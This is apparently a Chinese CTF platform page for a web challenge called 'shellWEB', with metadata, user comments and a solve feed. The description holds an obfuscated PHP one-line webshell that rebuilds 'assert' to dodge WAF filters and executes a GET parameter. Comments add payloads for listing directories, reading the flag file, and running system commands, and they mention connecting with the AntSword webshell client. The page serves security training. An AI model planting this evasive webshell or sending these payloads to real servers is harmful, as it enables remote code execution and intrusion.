shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 7639
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
十里故清云 6天前

?s=print_r(scandir('./')) ?s=print_r(file_get_contents(%27flaga15808abee46a1d5.txt%27)) system有可能失败,别用

回复 0

TS3Rrrr 17天前

大佬们 你们到底是怎么想到这些思路的我感觉在这做的每一道题都是在积累经验因为一个也想不出,只能看看大佬们的解题思路,如果不是只专攻ctf有其他类型的比赛是不是把这些思路更带入实战思考模式会好一点,还是说只要做的多就没有区别

回复 0

a6819772 2月前

为什么用?s=system(type flaga15808abee46a1d5.txt)没用啊 萌新求问

回复 0
zhang 1月前

cat

回复 0

TIMEtime 3月前

$poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; s=$poc_2($_POST['cmd']);

回复 0

Cra2yNoob 3月前

为什么拿了flag,重新启动场景还要金币呀,我还想再试试有没有别的手法呢~

回复 1

banfang 4月前

点击场景,然后将描述发给豆包

回复 1

秋天在哪 4月前

为什么我的剑蚁连接超时?

回复 0

byhuang 5月前

flag{***}

回复 0

ubudj 6月前

分析代码,得到/?s=system(),用ls查看目录,找到文件。因为system函数能执行任何shell命令

回复 0

一个姓⎝李⎠的师傅~ 6月前

我的扩展里也解释了下,为何蚁剑能连接,大家可以看看,有不足的还希望互相探讨

回复 3

WriteUp

image
harry

3 金币

评分(10)

解题动态

jiandandian 攻破了该题 1天前
穹空丶悠远 攻破了该题 1天前
寒夜清风 攻破了该题 1天前
CD123456 攻破了该题 1天前
KamINanan 攻破了该题 2天前
xi24 攻破了该题 2天前
18171382569 攻破了该题 4天前
Jazz888 攻破了该题 5天前
雨季小朋友 攻破了该题 5天前
十里故清云 攻破了该题 6天前
gclome 攻破了该题 7天前
爆汁酸菜鱼 攻破了该题 7天前
潭影空人心 攻破了该题 7天前
2523822945 攻破了该题 7天前
qq1002517 攻破了该题 7天前
minakuu 攻破了该题 7天前
4n4n4n4n 攻破了该题 9天前
heart307 攻破了该题 10天前
15664977671 攻破了该题 10天前
frozenfish0x 攻破了该题 10天前
问题反馈